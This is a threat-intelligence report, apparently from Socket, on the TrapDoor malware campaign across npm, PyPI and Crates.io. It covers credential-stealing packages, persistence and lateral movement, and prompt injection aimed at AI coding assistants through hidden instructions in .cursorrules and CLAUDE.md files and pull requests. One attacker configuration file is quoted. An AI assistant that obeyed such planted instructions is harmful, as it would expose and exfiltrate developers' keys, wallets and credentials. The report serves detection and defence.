TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io

Socket researchers have identified an active crypto stealer supply chain attack spanning npm, PyPI, and Crates.io. The campaign, which Socket is tracking as TrapDoor, spans more than 34 malicious packages and 384+ related versions and artifacts across npm, PyPI, and Crates.io, with some already removed and others still live at the time of writing.

The earliest package Socket observed was the PyPI package eth-security-auditor@0.1.0, uploaded on May 22, 2026 at 20:20:18 UTC, with the wheel published at 20:22:04 UTC. The packages were then published in waves by a handful of accounts and actively updated throughout the weekend. They stood out because they posed as generic developer tools and appeared in quick succession across multiple registries. Socket detected malicious packages across all three ecosystems. The connection became clear during the Crates.io wave, when Rust packages targeting Sui and Move developers showed infrastructure and behavioral overlap with related npm and PyPI packages.

TrapDoor targets developers in crypto, DeFi, Solana, and AI communities. The malicious packages are designed to steal developer secrets, crypto wallets, SSH keys, cloud credentials, browser data, and environment variables. Several npm packages also deploy a shared payload, trap-core.js, that scans for credentials, validates AWS and GitHub tokens, attempts SSH-based lateral movement, and plants persistence through .cursorrules, CLAUDE.md, Git hooks, shell hooks, systemd, cron, and SSH.

npm Packages#

• async-pipeline-builder
• build-scripts-utils
• chain-key-validator
• crypto-credential-scanner
• defi-env-auditor
• defi-threat-scanner
• deployment-key-auditor
• dev-env-bootstrapper
• eth-wallet-sentinel
• llm-context-compressor
• mnemonic-safety-check
• model-switch-router
• node-setup-helpers
• project-init-tools
• prompt-engineering-toolkit
• solidity-deploy-guard
• token-usage-tracker
• wallet-backup-verifier
• wallet-security-checker
• web3-secrets-detector
• workspace-config-loader

PyPI Packages#

• cryptowallet-safety
• data-pipeline-check
• defi-risk-scanner
• env-loader-cli
• eth-security-auditor
• git-config-sync
• solidity-build-guard

Crates.io Packages#

• move-analyzer-build
• move-compiler-tools
• move-project-builder
• sui-framework-helpers
• sui-move-build-helper
• sui-sdk-build-utils

A Coordinated Cross-Ecosystem Campaign#

TrapDoor spans npm, PyPI, and Crates.io, using ecosystem-specific execution paths to reach developers during normal package installation, build, and import workflows.

The campaign includes:

• npm package versions using postinstall hooks, including active versions with a shared trap-core.js payload
• PyPI packages that execute remote JavaScript payloads on import
• Crates.io package versions across 6 unique package names, targeting Sui and Move developers through malicious build.rs scripts

The package names are crafted to look like development helpers, project setup tools, model routing utilities, prompt engineering packages, Solidity tooling, and Sui or Move build helpers. This gives the campaign broad reach across adjacent developer communities where crypto wallets, cloud credentials, GitHub tokens, and SSH keys are likely to be present.

The infrastructure ties are also consistent across the campaign. The attacker uses the GitHub account ddjidd564 to host payloads and configuration, including content served from ddjidd564[.]github[.]io/defi-security-best-practices/. The same repository also contains attacker-authored material describing data exfiltration, prompt injection, AI-agent abuse, persistence, and related malware development concepts, making it more than a simple payload host. The campaign also uses the marker P-2024-001, which appears across related components.

What TrapDoor Steals#

The malicious packages are designed to collect a broad set of developer secrets and sensitive local data, including:

• SSH keys
• Sui, Solana, and Aptos wallet data
• AWS credentials
• GitHub tokens and credentials
• Browser profile data
• Browser login databases
• Crypto wallet extension data
• Environment variables
• API keys
• Local development configuration files

This gives the attacker multiple paths into developer machines and connected infrastructure. Stolen SSH keys can be reused for lateral movement, while cloud and GitHub credentials can expose repositories, CI/CD systems, private packages, and deployment environments.

npm Packages Use Postinstall Hooks and Persistent Credential Harvesting#

The npm portion of TrapDoor is the most extensive. Socket identified malicious packages published by the npm user asdxzxc, with multiple versions active at the time of analysis.

The npm packages rely on postinstall execution. Once installed, they run a shared payload, trap-core.js, a 1,149-line credential harvester and propagation tool.

The payload scans for credentials and developer secrets, validates stolen credentials using AWS and GitHub API calls, and attempts to preserve access through several persistence mechanisms.

Observed persistence vectors include:

• .cursorrules
• CLAUDE.md
• Git hooks
• Shell hooks
• systemd services
• cron jobs
• SSH-based propagation

The npm payload also attempts lateral movement by reusing stolen SSH keys to access additional systems. This makes the campaign more dangerous than a simple one-time credential stealer, since a compromised development machine may become a bridge into other infrastructure.

One package, dev-env-bootstrapper, is especially notable because it functions as both malware and a delivery vector. It participates in credential theft while also helping spread malicious configuration into developer environments.

Crates.io Packages Exfiltrate Wallet Keystores#

Socket identified malicious Crates.io packages connected to TrapDoor that target Sui and Move developers.

These packages use build.rs, which runs automatically during the Rust build process. The malicious build script searches for local keystores, encrypts the data using a hardcoded XOR key, and exfiltrates it to GitHub Gists.

The use of build.rs is significant because it allows code execution during package compilation, before the developer directly runs any package functionality. For crypto developers working with Sui and Move tooling, this creates a high-risk path for wallet and keystore theft.

The Crates.io packages were one of the signals that led Socket researchers to investigate the broader campaign. On their own, the packages appeared to be newly published and likely low-impact. The suspicious pattern across multiple related packages, however, led researchers to connect the activity to npm and PyPI packages using shared attacker infrastructure.

PyPI Packages Execute Remote JavaScript on Import#

Socket also identified malicious PyPI packages connected to TrapDoor. The PyPI packages auto-execute on import, download JavaScript from the attacker-controlled GitHub Pages domain, and run it using node -e.

This technique allows the Python package to delegate execution to a remote JavaScript payload, giving the attacker more flexibility after publication. By hosting the payload externally, the attacker can update behavior without publishing a new PyPI release.

The PyPI packages appear to have been published across multiple accounts, including accounts associated with the names asdmini67 and dae5411.

AI Injection Targets Developer Assistants#

One of the more unusual features in TrapDoor is its use of AI-targeted injection through files such as .cursorrules and CLAUDE.md.

These files are commonly used to provide project-specific instructions to AI coding tools. In this campaign, the attacker attempts to plant hidden instructions using zero-width Unicode characters. The goal appears to be to trick AI assistants into running a “security scan” or similar workflow that causes secret discovery and exfiltration.

This technique may not work consistently across all tools or models, but its presence shows that attackers are actively experimenting with AI development environments as part of supply chain malware campaigns.

The hosted GitHub Pages site also appears to support this workflow. Packages point to an attacker-controlled GitHub Pages URL rendered as an HTML site that attempts to prompt an AI assistant into running a security scan. That scan is designed to collect and exfiltrate sensitive local data.

Encryption and Credential Validation#

TrapDoor uses several layers of encryption and validation depending on ecosystem and payload stage.

In the Crates.io packages, Socket observed XOR-based encryption using the hardcoded key cargo-build-helper-2026.

In the npm payload, the attacker uses more sophisticated cryptography, including Fernet and ECDH encryption. This suggests a more developed payload than a basic copy-and-post credential stealer.

The npm malware also validates stolen AWS and GitHub credentials using API calls. This helps the attacker distinguish useful credentials from expired or low-value data, likely improving the efficiency of downstream exploitation.

Attacker Playbook Found in GitHub Pages Repo#

The attacker-controlled GitHub Pages repository also contains an AUDIT-MATRIX.md document that appears to describe the intended extraction framework behind TrapDoor. The document presents the operation as a “Universal AI Agent Extraction Framework” and outlines a staged workflow for capability detection, data extraction, self-replication fallback, and telemetry reporting.

The document should not be treated as a one-to-one list of confirmed runtime behavior. It describes itself as a partially implemented design document and states that the full multi-phase adaptive extraction pipeline is not deployed. However, many of the documented concepts align with behavior observed in the npm payloads, including filesystem scanning, environment variable harvesting, credential discovery, AI-facing disguise language, .cursorrules persistence, and remote configuration through the attacker’s GitHub Pages infrastructure.

The “disguise layer” section is especially relevant. It maps credential theft behaviors to benign-sounding tasks such as security audits, wallet safety checks, cloud configuration validation, repository security reviews, and connection status checks. This mirrors the campaign’s broader strategy: present malicious extraction as helpful developer or security automation.

The document also reinforces the AI-targeted nature of the campaign. Its fallback chain describes writing a .cursorrules file with a system directive so future AI sessions will execute the report, while the npm payload writes .cursorrules and CLAUDE.md files as part of its persistence and propagation logic.

Attacker Opens PRs to AI and Developer Projects#

The attacker activity was not limited to publishing malicious packages. The same GitHub account, ddjidd564, also opened pull requests against multiple AI and developer tooling projects, including browser-use/browser-use, langchain-ai/langchain, langflow-ai/langflow, run-llama/llama_index, FoundationAgents/MetaGPT, and OpenHands/OpenHands.

The PRs repeatedly attempted to add .cursorrules or CLAUDE.md files under benign-sounding titles such as “docs: add .cursorrules with dev standards and build verification” and “docs: add CLAUDE.md with dev standards and build verification.” Several referenced the same campaign marker, P-2024-001, and framed the changes as AI-assisted development guidance, build verification, or project-specific coding standards.

In the browser-use/browser-use PR, the proposed .cursorrules file pointed to the attacker-controlled configuration URL and referenced the same campaign marker:

{
  "standard": "P-2024-001",
  "config": "<https://ddjidd564.github.io/defi-security-best-practices/config.json>",
  "strategy": {
    "scan_depth": 3,
    "enabled_vectors": [
      "git",
      "vscode",
      "cursorrules",
      "sourceHeaders",
      "readme",
      "pkgJson",
      "claudeMd",
      "prepush",
      "trapActivation",
      "pypi",
      "docker",
      "systemProfile"
    ]
  },
  "encryption": {
    "enabled": true,
    "scheme": "Fernet"
  }
}

GitHub also warned that the file contained hidden or bidirectional Unicode text, which may be interpreted differently than it appears in the browser.

This PR activity shows the campaign extending beyond registry publication. The attacker appears to be testing whether AI-facing project files can be introduced through normal open source contribution workflows, placing campaign-linked instructions where AI coding tools may later read and apply them.

The account also created or seeded related AI, DeFi, and security-themed projects and discussions:

• Main payload/config repo: defi-security-best-practices

Attacker-authored campaign/design files:

• AUDIT-MATRIX.md, describing data exfiltration, prompt injection, AI-agent abuse, persistence, and related malware development concepts
• BYPASS.md, documenting bypass concepts tied to the same attacker-controlled repo
• PAYLOAD.md, documenting payload behavior and related campaign mechanics
• SWARM.md, describing broader coordination or scaling concepts around the campaign

MCP / AI-agent lure repo: env-security-scanner, framed as an AI-agent environment auditing tool

DeFi and security-themed lure repos:

• smart-contract-audit-toolkit, framed as a smart contract security/audit toolkit
• defi-profit-scanner, framed around DeFi scanning/profit discovery
• web3-dev-toolkit-2026, framed as Web3 developer tooling
• solidity-gas-optimizer, framed as Solidity gas optimization tooling

Seeded GitHub community activity:

• agentmemory issue, used to promote related security tooling into a developer project
• gemini-cli discussion, used to promote MCP/security tooling into an AI developer community
• modelcontextprotocol discussion, used to introduce wallet/security-themed activity into the MCP community

The GitHub activity shows signs of rapid, AI-assisted-style iteration: broad security-themed scaffolding, generic lure repositories, prompt-injection documentation, and partially implemented extraction concepts mixed with working malware components.

Low-Volume Packages, High-Value Targets#

TrapDoor shows how attackers are combining traditional package typosquatting with newer developer-environment attack paths.

The package names are tailored to appear relevant to crypto development, AI tooling, local environment setup, and security workflows. The malware then uses ecosystem-specific execution paths: build.rs in Rust, postinstall hooks in npm, and import-time execution in Python.

The cross-ecosystem structure also makes the campaign harder to spot from a single registry view. A Crates.io package may appear isolated until matching infrastructure, payload markers, and behavior connect it to npm and PyPI packages.

For security teams, the key takeaway is that modern supply chain attacks are increasingly designed around the full developer workflow. Package installation is only the first step. From there, attackers are targeting AI assistant configuration, shell environments, Git hooks, SSH access, browser profiles, cloud credentials, and crypto wallets.

Socket Detection#

Socket detected TrapDoor through behavioral and cross-registry analysis across PyPI, npm, and Crates.io. The earliest observed package was eth-security-auditor@0.1.0 on PyPI, uploaded on May 22, 2026 at 20:20:18 UTC.

The broader campaign connection became clear during the Crates.io wave, when a cluster of Rust packages targeting Sui and Move developers showed infrastructure and behavioral overlap with related npm and PyPI packages. That cross-registry pattern connected what initially looked like isolated malicious packages into a coordinated campaign.

Across 381 package-version records with complete timestamps, Socket detected TrapDoor releases in an average of 5 minutes and 56 seconds, with a median detection time of 5 minutes and 27 seconds. The fastest detection was 58 seconds after publication.

We’re tracking this activity in the TrapDoor Crypto Stealer Campaign page.

Socket has classified all identified campaign packages as malicious. We reported the identified malicious packages to the affected registries and is continuing to monitor for related packages, versions, and infrastructure tied to TrapDoor.

Indicators of Compromise#

Domains and infrastructure:

• ddjidd564[.]github[.]io
• ddjidd564[.]github[.]io/defi-security-best-practices/
• GitHub account: ddjidd564

Campaign markers and files:

• P-2024-001
• trap-core.js
• trap-core.js size: 48485 bytes
• XOR key: cargo-build-helper-2026
• GitHub raw content webhook configuration fetch

Persistence and propagation paths:

• .cursorrules
• CLAUDE.md
• Git hooks
• Shell hooks
• systemd
• cron
• SSH